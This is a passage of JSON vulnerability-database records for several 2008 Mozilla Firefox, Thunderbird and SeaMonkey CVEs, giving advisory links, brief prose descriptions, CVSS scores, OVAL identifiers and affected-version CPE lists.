"http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "https://bugzilla.mozilla.org/show_bug.cgi?id=444075", "https://bugzilla.mozilla.org/show_bug.cgi?id=444077", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://www.securitytracker.com/id?1020915", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "http://www.redhat.com/support/errata/RHSA-2008-0879.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "The XPConnect component in Mozilla Firefox before 2.0.0.17 and 3.x before 3.0.2, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allows remote attackers to \"pollute XPCNativeWrappers\" and execute arbitrary code with chrome privileges via vectors related to (1) chrome XBL and (2) chrome JS.", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4058", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:05", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9679", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9679"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4058"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9679", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9679"}], "modified": "2017-09-28T21:31:57", "cpe": ["cpe:/a:mozilla:thunderbird:2.0.0.11", "cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:2.0_.13", "cpe:/a:mozilla:thunderbird:2.0_.14", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.7.1", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:thunderbird:2.0_.12", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:thunderbird:2.0.0.13", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:thunderbird:1.0.5:beta", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:2.0_.4", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:2.0_8", "cpe:/a:mozilla:thunderbird:2.0_.6", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:seamonkey", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0_.5", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:firefox:0.9.3", "cpe:/a:mozilla:thunderbird:2.0.0.15", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.7.3", "cpe:/a:mozilla:thunderbird:2.0_.9", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6"], "id": "CVE-2008-4058", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4058", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:05", "references": ["http://www.mozilla.org/security/announce/2008/mfsa2008-41.html", "http://www.debian.org/security/2008/dsa-1669", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://www.debian.org/security/2008/dsa-1649", "http://www.debian.org/security/2009/dsa-1696", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "https://bugzilla.mozilla.org/show_bug.cgi?id=419848", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://www.securitytracker.com/id?1020915", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45352", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "The XPConnect component in Mozilla Firefox before 2.0.0.17 allows remote attackers to \"pollute XPCNativeWrappers\" and execute arbitrary code with chrome privileges via vectors related to a SCRIPT element.", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4059", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:05", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9529", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9529"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4059"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9529", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9529"}], "modified": "2017-09-28T21:31:57", "cpe": ["cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:firefox:1.0.6::linux", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:firefox:2.0:rc3", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:firefox:2.0:rc2", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:firefox:2.0:beta1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:firefox", "cpe:/a:mozilla:firefox:0.9.3"], "id": "CVE-2008-4059", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4059", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:05", "references": ["http://www.mozilla.org/security/announce/2008/mfsa2008-41.html", "http://www.debian.org/security/2008/dsa-1669", "https://bugzilla.mozilla.org/show_bug.cgi?id=448548", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "https://bugzilla.mozilla.org/show_bug.cgi?id=451037", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45353", "http://www.debian.org/security/2008/dsa-1649", "http://www.debian.org/security/2009/dsa-1696", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01335.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://www.securitytracker.com/id?1020915", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "http://www.redhat.com/support/errata/RHSA-2008-0879.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "Mozilla Firefox before 2.0.0.17 and 3.x before 3.0.2, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allow remote attackers to create documents that lack script-handling objects, and execute arbitrary code with chrome privileges, via vectors related to (1) the document.loadBindingDocument function and (2) XSLT.", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4060", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:05", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11607", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11607"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4060"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11607", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11607"}], "modified": "2017-09-28T21:31:57", "cpe": ["cpe:/a:mozilla:thunderbird:2.0.0.11", "cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:2.0_.13", "cpe:/a:mozilla:thunderbird:2.0_.14", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.7.1", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:thunderbird:2.0_.12", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:thunderbird:2.0.0.13", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:thunderbird:1.0.5:beta", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:2.0_.4", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:2.0_8", "cpe:/a:mozilla:thunderbird:2.0_.6", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:seamonkey", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0_.5", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:firefox:0.9.3", "cpe:/a:mozilla:thunderbird:2.0.0.15", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.7.3", "cpe:/a:mozilla:thunderbird:2.0_.9", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6"], "id": "CVE-2008-4060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4060", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-08T11:24:52", "references": ["http://www.debian.org/security/2008/dsa-1669", "http://www.securityfocus.com/bid/31346", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45350", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "https://bugzilla.mozilla.org/show_bug.cgi?id=360529", "http://www.vupen.com/english/advisories/2008/2661", "http://www.debian.org/security/2008/dsa-1649", "https://bugzilla.mozilla.org/show_bug.cgi?id=430658", "http://www.securitytracker.com/id?1020914", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-39.html", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "feedWriter in Mozilla Firefox before 2.0.0.17 allows remote attackers to execute scripts with chrome privileges via vectors related to feed preview and the (1) elem.doCommand, (2) elem.dispatchEvent, (3) _setTitleText, (4) _setTitleImage, and (5) _initSubscriptionUI functions.", "edition": 2, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-3836", "type": "cve", "enchantments": {"score": {"modified": "2017-08-08T11:24:52", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-3836"], "scanner": [], "modified": "2017-08-07T21:32:12", "cpe": ["cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:firefox:0.9.3"], "id": "CVE-2008-3836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3836", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:06", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=448166", "http://www.debian.org/security/2008/dsa-1669", "http://blogs.technet.com/bluehat/archive/2008/08/14/targeted-fuzzing.aspx", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45358", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.securitytracker.com/id?1020920", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://jvn.jp/en/jp/JVN96950482/index.html", "http://www.debian.org/security/2008/dsa-1649", "http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-000058.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "http://www.ubuntu.com/usn/usn-645-2", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "http://www.thespanner.co.uk/2008/06/30/javascript-protocol-fuzz-results/", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", 